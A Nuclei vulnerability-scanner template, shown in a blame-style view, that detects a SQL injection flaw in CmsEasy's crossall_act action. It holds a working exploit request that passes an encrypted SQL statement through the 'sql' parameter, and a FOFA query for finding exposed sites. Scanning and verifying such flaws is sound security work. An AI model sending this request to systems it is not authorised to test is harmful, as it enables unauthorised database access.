nuclei-templates/http/vulnerabilities/other/cmseasy-crossall-act-sqli.yaml

37 lines
1.2 KiB
YAML
Raw Normal View History

2023-09-08 11:25:00 +00:00
id: cmseasy-crossall-sqli
2023-08-18 03:22:06 +00:00
info:
2023-09-08 11:25:00 +00:00
name: CmsEasy crossall_act - SQL Injection
2023-08-18 03:22:06 +00:00
author: SleepingBag945
severity: high
description: |
2023-09-08 11:25:00 +00:00
CmsEasy crossall_act.php SQL Injection Vulnerability. CmsEasy has a SQL injection vulnerability. Any SQL command can be executed by encrypting the SQL statement in the file service.php.
reference:
- https://cn-sec.com/archives/1580677.html
- https://github.com/GREENHAT7/pxplan/blob/e2fc04893ca95e177021ddf61cc2134ecc120a8e/goby_pocs/CmsEasy_crossall_act.php_SQL_injection_vulnerability.json#L28
2024-09-10 09:08:16 +00:00
classification:
cpe: cpe:2.3:a:cmseasy:cmseasy:*:*:*:*:*:*:*:*
2023-08-18 03:22:06 +00:00
metadata:
2023-09-08 11:25:00 +00:00
verified: true
2023-10-14 11:27:55 +00:00
max-request: 1
2024-09-10 08:22:50 +00:00
vendor: cmseasy
2024-09-10 09:08:16 +00:00
product: cmseasy
fofa-query: app="CmsEasy"
2023-09-08 11:25:00 +00:00
tags: cmseasy,sqli
2023-08-18 03:22:06 +00:00
http:
2023-09-08 11:25:00 +00:00
- method: GET
path:
- "{{BaseURL}}/?case=crossall&act=execsql&sql=WY8gzSfZwW9R5YvyK"
2023-08-18 03:22:06 +00:00
matchers-condition: and
matchers:
- type: word
2023-09-08 11:25:00 +00:00
part: body
2023-08-18 03:22:06 +00:00
words:
- '{"123":"123"}'
- type: status
status:
2023-10-14 11:27:55 +00:00
- 200
2024-09-12 05:14:01 +00:00
# digest: 490a00463044022034598e7129b54ed24808bf59bbfa7d1546c177565a9157625120efdb3e5eeb6602207a38f3ac7f6be84497ebd57fa908347868c0080a379f629ec568b5724cbb7dcf:922c64590222798bb761d5b6d8e72950